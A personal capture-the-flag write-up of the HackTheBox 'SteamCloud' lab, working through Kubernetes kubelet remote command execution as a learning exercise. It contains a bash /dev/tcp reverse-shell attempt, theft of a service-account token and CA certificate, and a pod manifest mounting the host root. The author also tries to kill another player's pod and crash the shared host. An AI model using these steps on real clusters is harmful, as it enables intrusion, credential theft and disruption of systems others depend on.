HackTheBox: Steamclou
This is a retired easy box that's free until mid-august.
Initial scan shows a LOT of ports open:
22/tcp open ssh
80/tcp open http
2379/tcp open etcd-client
2380/tcp open etcd-server
8443/tcp open https-alt
10249/tcp open unknown
10250/tcp open unknown
10256/tcp open unknown
I suspect that the last three are dummy ports though; not technically false positives, but not relevant to this box. Ive noticed that with HTB boxes before. It could actually be ports opened by other players, maybe for reverse shells or something.
Script scan of just the open ports shows the following condensed info:
80: nginx 1.14.2
2379: ssl/etcd-server, commonName=steamcloud
2380: ssl/etcd-server, commonName=steamcloud
8443: ssl/https-alt
We get a 403 error when tying to access the https page on 8443. Interestingly, two of the HTTPS headers mention Kubernetes;
X-Kubernetes-Pf-Flowschema-Uid: def40b57-6b30-44bf-8ddf-99cff7e84c4c
X-Kubernetes-Pf-Prioritylevel-Uid: 92ad2766-c55b-4df8-b9cd-8c5cf52f6354
Nikto finds something potentially useful about port 8443:
Hostname '' does not match certificate's names: minikube.
Assumedly this means that the target's hostname, or ONE of it's host names, it "minikube." Ill add that to /etc/hosts and see if anything changes. I also went ahead and added "steamcloud" and "steamcloud.htb", since they appeared in the nmap script scan.
/etc/hosts minikube steamcloud steamcloud.htb
Nope, no luck with either HTTP or HTTPS on 8443 using any of those three names. Ill keep nikto running in the background while I do some research on "etcd-server" to see what that's all about.
Nikto only got a false-positive about a #wp-config.php file on the http server. For the https server on 8443, it identified the kubernetes header I saw earlier as well as one more:
+ /: Uncommon header 'x-kubernetes-pf-prioritylevel-uid' found, with contents: 92ad2766-c55b-4df8-b9cd-8c5cf52f6354.
+ /: Uncommon header 'x-kubernetes-pf-flowschema-uid' found, with contents: def40b57-6b30-44bf-8ddf-99cff7e84c4c.
+ /: Uncommon header 'audit-id' found, with contents: da0a1437-bfe2-4933-9df9-a751466223d8.
If UID means what I think it does, then these are probably some kind of user IDs embedded in the response. That may or may not be useful down the line.
Im still a complete newb to nginx, but from my own reading and also from hearing ippsec say it, it sounds like nginx is often used just as a reverse proxy in front of a server. So I assume what that means is that if we send the right HTTP requests, this nginx server may forward it somewhere else internally in the target and we might get a response. Not sure though.
Hold on: I don't know how the fuck this slipped by me in the first place, but the nmap script did something with DNS to resolve host name, and I totally ignored it. I dont know how it wouldve, since as far as I can tell there's no DNS gateway here. Let me go back and see what it said:
Nmap script scan also shows something else that for some reason didn't appear when I manually intercepted the request/response with Burp. Its a string in the response from port 8443 that looks interesting:
Something about Trinity.txt.bak.
But for reference, this is all I see in Burp:
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {
So I dont know where nmap is getting the whole "Trinity.txt.bak" thing...
Okay, apparently thats just an artifact of nmap. Googling trinity.txt.bak pulls up similar results and apparently its just an nmap thing.
Back to ports 2379 and 2380, these are "etcd" ports. I believe 2379 is client and 2380 is server, and it's a kubernetes-related protocol for what sounds like data synchronization. Apparently 'etcd' is a key-value store (almost like a database? eg 'key'='value'). It looks like there are metasploit modules for scanning these ports, and from what Ive seen it almost looks like it just brute-forces key names to see if it gets any values out. But not sure...
The nmap script scan identifies both etcd ports (client and server) as having commonName 'steamcloud'.
Research: What is kubernetes?
From the sounds of it, [[Kubernetes]] is a management system for container-based applications. It helps you manage services distributed between multiple hosts, each host running one or more containers used by the application. It sounds like the point of it is to assist scaling. One thing yo can do with it is set up automated backups, for example.
It appears that Kubernetes is basically an entire framework rather than one piece of software, and it basically has its own set of jargon terms.
Even though I probably COULD just look up an article on how to pentest kubernetes boxes, I may as well invest the time to actually learn what it's all about. It would serve me better in the long term; for one thing I might actually encounter Kubernetes in engineering, and Im sure Ill also see it again in different boxes.
Okay. So its a way of managing clusters of containers (which are NOT the same as virtual machines in that each container is not running it's own OS, from what I can tell).
![[Pasted image 20230724204838.png]] (That key-value store it shows is what is running on ports 2379 and 2380)
So the worker node(s) are the machines that run the actual containers, and the master node runs the control software that manages the worker nodes. Obviously the worker node and master node could be the same physical machine, I assume.
So that makes sense I guess. Now what is the key-value store?
It appears to be a relatively simple database that just associates values with key terms. Essentially its just a 2-column database where one column is the key and the other is the value. ==I dont know if you query it for a specific value or if you just dump the entire thing?==
Kubernetes uses distributed key-value stores, which spread the store over potentially multiple machines for the sake of parallelizing operations.
It stores ALL its data in a key-value store (Specifically etcd): config data,state, metadata, etc), and because Kubernetes has to manage distributed nodes, its database has to be accessible to those machines as well. Hence the 'distributed' key value store, it runs on a server.
Okay, so now we're getting somewhere. We would expect that the key-value store will hold all the config info for the kubernetes app.
Accessing the key-value store
At this step it looks like the best option would be to try and dump the key-value store's contents. From looking online there appear to be a couple ways of doing this. One option is to use metasploit, which has a scanner for etcd. The other is to try and do it manually using the etcd client (https://etcd.io/docs/v3.4/dev-guide/interacting_v3/).
The second option would require installing from source which I didnt feel like doing, and the metasploit module didnt work either. Let me check the walkthrough quickly:
Consulting the walkthrough
Looks like I didnt do my research well enough. Turns out port 10250 is actually what should have caught my attention; its the default port for a kubernetes extension called Rancher.
Also, port 8443 is actually the default port for the Kubernetes API (although other services use it too).
Should feel embarrassed about missing that; all it would have taken is a 5-second google search to figure out what it was.
The walkthrough ran the following command to dump data from port 10250:
$ curl -k
(the -k flag ignores ssl cert warnings)
So obviously I didnt do my research. Anyway, that's enough of a hint. Ill go back to my own devices now
Back on my own
So port 10250 inidicates that this kubernetes system has "Rancher" installed. From its documentation,
The port **10250** on the `kubelet` is used by the `kube-apiserver` (running on hosts labeled as **Orchestration Plane**) for exec and logs. It’s very important to lock down access to this port, only the hosts labeled as **Orchestration Plane** should be able to access `kubelet` on port **10250**.
Here's a useful hacktricks page on kubernetes that discusses port 10250: https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services
According to hacktricks,
If you can list nodes you can get a list of kubelets endpoints with:
kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port' | grep -v KUBELET_PORT | while IFS='' read -r node; do
So I have to install kubectl which looks like a pain in the ass. Im also out of time for today so Ill pick it up tomorrow.
Back the next day, following writeup
For the sake of time, and because this is my first Kubernetes box, Im just going to use the writeup liberally. Im also going to do this the lazy way and not only do as much research as I need to, rather than research until I feel I understand Kubernetes completely.
It may not be the "right" way to do it, but when you only have 2 hours or less a day its hard not to cut some corners.
Where we left off, we had just dumped the list of pods using port 10250 (Rancher) using
curl -k
Lets skim through this data and see what stands out.
Also, a quick note: This data appears to be in JSON form, and its much easier to read by just typing the url into the browser to have the browser format it.
So there appear to be 9 objects listed in the pods dump: 0) etcd-steamcloud 1) kube-apiserver-steamcloud 2) kube-controller-manager-steamcloud 3) kube-scheduler-steamcloud 4) 0xdf-pod 5) lewin 6) storage-provisioner 7) kube-proxy-9vxv7 8) coredns-78fcd69978-vx457 9) nginx
The writeup at this point decides to use a CLI tool called kubeletctl to interact with the system, and installs it as follows:
curl -LO
chmod a+x ./kubeletctl_linux_amd64
mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl
This kubeletctl tool can be used to scan for pods, account tokens, RCE vulnerabilities, etc.
I used the "scan rce" option to check for RCE vulns in any of the pods, and it found that 'nginx', 'kube-proxy-9vxv7', and '0xdf-pod' were all vulnerable.
==The walkthrough singled out the nginx pod, Im not totally sure why.== But he decided to target that one and try to run commands on there using the kubeletctl tool's "exec" command.
==Okay, just to clarify, a POD encloses one or more CONTAINERS.==
When you use kubeletctl to run commands through RCE you need to specify both the pod and the container as well as the server.
==How exactly does RCE through pods work?==
Anyway, following the writeup, I ran "id" on the nginx pod as follows:
$ kubeletctl exec "id" -p nginx -c nginx --server
uid=0(root) gid=0(root) groups=0(root)
Nice. Its root and I have RCE. The walkthrough didnt do this, but I also checked the other containers that came up as vulnerable for RCE. The '0xdf-pod' is also running as root, but the proxy one gave me an error.
Okay, lets get a reverse shell on the nginx one I guess. Im still not sure why he singles that one out, but Ill roll with it for the sake of time.
kubeletctl exec "bash -i >& /dev/tcp/ 0>&1" -p nginx -c nginx --server
No luck there... and from viewing /etc/shadow in both containers, I can see there are no users besides root. I actually did find both the user and root flags by just exec'ing "find / -name root.txt" and "user.txt", but I assume thats not how your supposed to do it.
The writeup tries to priv esc by extracting the account token and SSL cert from the container so that it can use those creds to access the master node via the kubelet API on port 8443. From there the master node will think its the kubelet accessing it, and he will be able to run commands as that kubelet. Depending on the permissions of the kubelet, he will see what he can do.
Okay. Im pretty much just going through the motions right now. I get rougjly what's going on, but Im not sure how he knew where to look for each thing. Assumedly he just has experience with Kubernetes already, or he owns a crystal ball and didnt mention it. Whatever. Ill try not to get too pissed off at this one.
Grabbing the token and SSL cert for priv esc
Like I said, Im just following the writeup and not trying to figure it out myself.
This is basically what he did to grab the token and SSL cert, but with minor tweaks to skip a few steps:
$ kubeletctl exec "ls /var/run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx --server
ca.crt namespace token
$ token=`kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx --server`
$ echo $token
$ kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx --server >> ca.crt
$ cat ca.crt
Okay. Now we have to install kubectl (the official kubernetes CLI) to use these creds to access the official API:
$ curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
$ chmod +x kubectl
$ sudo mv kubectl /usr/bin/kubectl
Okay. Now we connect to the API on port 8443 (this is verbatim from the writeup save for the IP):
$ kubectl --token=$token --certificate-authority=ca.crt --server= get pods
0xdf-pod 1/1 Running 0 14h
lewin 0/1 CrashLoopBackOff 36 (48s ago) 161m
nginx 1/1 Running 0 19h
Cool. So we can see the pods. This doesnt show all of the ones that kubeletctl did, I guess this only shows user-created pods.
Now he checks what permissions he has using
$ kubectl --token=$token --certificate-authority=ca.crt --server= auth can-i --list
pods [] [] [get create list]
So this user can get, create, and list pods.
Honestly, from this point on I have no idea WTF the author of the writeup is doing. He makes a new pod using the same nginx image as the existing nginx container, mounts that image in the new pod, and then reads the files in the nginx container THROUGH the new pod he created with that image mounted inside. But he doesnt explain WHY, and it makes no fucking sense to do that, since youre already root on the existing nginx container. As in, I already found the fucking flags on it.
I truly dont see the point of what this guy is doing unless its just an exercise for the sake of learning how to do it. But since we used creds FOUND FROM THIS CONTAINER USING RCE to get this far, this step is completely fucking irrelevant...
This writeup by 0xdf is way better:
Okay, so I misunderstood what the other author was doing by creating another container. What hes actually doing is creating a container with the HOST MACHINE's system root "/" mounted within the container, NOT the "/root" dir of the nginx container. I was doubly confused. So basically hes creating another container that he can use to explore files on the machine hosting the kubernetes server. He doesnt technically have control over the host though, he's just able to view its file system. I also don't know if its a COPY of the host file system or if its actually synchronized and he can affect it. If he can write on the host filesystem, than I guess he could potentially GET RCE in a number of ways, depending on his permissions.
I am confused though. Is it normal for the host API to just let you mount the entire system root into a container? I would assume that could only happen through a major misconfiguration, like either running the API as root or having bad permission settings...
Oh well. Lets see if I can get actual RCE on the host.
ALSO: the 0xdf-pod is NOT supposed to be there. That was probably created by another user. So you really DO have to use this method to get the root flag on this box, I just didnt realize that I wasnt supposed to be able to see that box.
So to create a new box you need to make a .yaml file. There's one in the 0xdf writeup, so Ill just copy+paste that.
apiVersion: v1
kind: Pod
name: not-part-of-the-ctf
namespace: default
- name: not-part-of-the-ctf
image: nginx:1.14.2
- mountPath: /mnt
name: hostfs
- name: hostfs
path: /
automountServiceAccountToken: true
hostNetwork: true
(I changed the name from 0xdf-pod to "not-part-of-the-ctf" so that other players wouldnt make the same mistake hopefully)
Then create it using kubectl apply:
$ kubectl --token=$token --certificate-authority=ca.crt --server= apply -f malicious_pod.yaml
pod/not-part-of-the-ctf created
Then list pods to confirm it was created and is running:
$ kubectl --token=$token --certificate-authority=ca.crt --server= get pods
0xdf-pod 1/1 Running 0 15h
lewin 0/1 CrashLoopBackOff 47 (4m2s ago) 3h41m
nginx 1/1 Running 0 20h
not-part-of-the-ctf 0/1 CrashLoopBackOff 2 (26s ago) 51s
Aaaand... its not. It crashed.
I think its because the jerkoff who copy+pasted the '0xdf-pod' verbatim from the writeup never terminated it afterwards, and probably only one machine can mount the root at a time. Checking the 0xdf-pod's configuration using
$ kubectl --token=$token --certificate-authority=ca.crt --server= get pod 0xdf-pod -o yaml
I can see that he did in fact just copy+paste, so I guess I can just finish the CTF through that container. Fucking twat. Im gonna see if I can get RCE and shut his down.
The 0xdf writeup credits one of his readers for pointing out that you CAN get a shell through kubeletctl without needing a reverse shell:
$ kubeletctl exec "/bin/bash" -p 0xdf-pod -c 0xdf-pod --server
Beautiful. So now I have a root shell in this douchebag's box, which assumedly is hooked up to the host file system.
Got the flags. I tried to do some "extra credit" and shut down the 0xdf-box unsuccessfully, ran out of time. See "After rooting" for details
After rooting
Having to use the writeup took all the fun out of this one, and to be honest I had no real interest in learning about kubernetes. Oh well. I guess I still learned something.
I cant pretend to take credit for beating this or anything since I used the writeup for every part of this process.
==I am curious though, how exactly does the kubeletctl tool check for and execute RCE on a container? Read the source code if its available to find out.== I dont have the source code on my system since I just installed a binary, but it may be on Github.
I tried to shut down the other guy's pod to see if mine would work afterwards. Basically I got a root shell in his box by just running
$ kubeletctl exec "/bin/bash" -p 0xdf-pod -c 0xdf-pod --server
and then I navigated into the host machine's file system which is in the pod's /mnt:
root@steamcloud:/# cd /mnt
cd /mnt
root@steamcloud:/mnt# ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var
I suspected that this file system was 'live' and not just a copy of the original. To verify this I went to /proc (really /mnt/proc since this is just another device's file system mounted in /mnt), ran ls a few times, and saw that the PID numbers were actually changing; this confirms that it IS live file system from the host:
root@steamcloud:/mnt# cd proc
cd proc
root@steamcloud:/mnt/proc# ls
1 1447 1693 26 36 617 82 interrupts self
10 1449 17 2604 387 62 83 iomem slabinfo
10806 1455 1733 2623 4 620 84 ioports softirqs
11 1463 178 2662 407 63 85 irq stat
11073 147 19 26692 452 64 86 kallsyms swaps
11091 148 2 2680 455 65 87 kcore sys
11349 149 20 27 456 66 9 key-users sysrq-trigger
11367 15 2042 2706 54 67 97 keys sysvipc
11394 150 21 2734 55 68 acpi kmsg thread-self
11411 151 2133 2752 56 680 buddyinfo kpagecgroup timer_list
11431 1517 2150 28 560 69 bus kpagecount tty
11554 152 22 29 561 70 cgroups kpageflags uptime
12 1524 2220 3 57 71 cmdline loadavg version
12448 1530 2238 30 578 72 consoles locks vmallocinfo
12464 1533 2276 30772 58 73 cpuinfo meminfo vmstat
12626 154 229 30791 582 74 crypto misc zoneinfo
12803 155 2297 31 585 75 devices modules
13178 16 2298 31281 586 76 diskstats mounts
13191 1612 23 32 588 77 dma mtrr
13448 1634 2320 33 59 78 driver net
13464 1639 24 34 591 79 execdomains pagetypeinfo
13635 1656 2412 354 6 8 fb partitions
[[13660]] 1672 2430 356 60 80 filesystems sched_debug
14 1674 25 357 61 81 fs schedstat
root@steamcloud:/mnt/proc# ls
1 1447 1693 26 36 617 82 interrupts self
10 1449 17 2604 387 62 83 iomem slabinfo
10806 1455 1733 2623 4 620 84 ioports softirqs
11 1463 178 2662 407 63 85 irq stat
11073 147 19 26692 452 64 86 kallsyms swaps
11091 148 2 2680 455 65 87 kcore sys
11349 149 20 27 456 66 9 key-users sysrq-trigger
11367 15 2042 2706 54 67 97 keys sysvipc
11394 150 21 2734 55 68 acpi kmsg thread-self
11411 151 2133 2752 56 680 buddyinfo kpagecgroup timer_list
11431 1517 2150 28 560 69 bus kpagecount tty
11554 152 22 29 561 70 cgroups kpageflags uptime
12 1524 2220 3 57 71 cmdline loadavg version
12448 1530 2238 30 578 72 consoles locks vmallocinfo
12464 1533 2276 30772 58 73 cpuinfo meminfo vmstat
12626 154 229 30791 582 74 crypto misc zoneinfo
12803 155 2297 31 585 75 devices modules
13178 16 2298 31281 586 76 diskstats mounts
13191 1612 23 32 588 77 dma mtrr
13448 1634 2320 33 59 78 driver net
13464 1639 24 34 591 79 execdomains pagetypeinfo
13635 1656 2412 354 6 8 fb partitions
[[13661]] 1672 2430 356 60 80 filesystems sched_debug
14 1674 25 357 61 81 fs schedstat
Notice the PID number I put in brackets between the two times I ran ls. These are different, thus confirming that the file system is actually changing, which means it is live.
I tried to force the system to crash by running the following:
root@steamcloud:/mnt/proc# rm -r 1
Because PID 1 is /sbin/init, which is basically running the system:
root@steamcloud:/mnt/proc# cd 1
cd 1
root@steamcloud:/mnt/proc/1# ls
attr exe mounts projid_map status
autogroup fd mountstats root syscall
auxv fdinfo net sched task
cgroup gid_map ns schedstat timers
clear_refs io numa_maps sessionid timerslack_ns
cmdline limits oom_adj setgroups uid_map
comm loginuid oom_score smaps wchan
coredump_filter map_files oom_score_adj smaps_rollup
cpuset maps pagemap stack
cwd mem patch_state stat
environ mountinfo personality statm
root@steamcloud:/mnt/proc/1# cat cmdline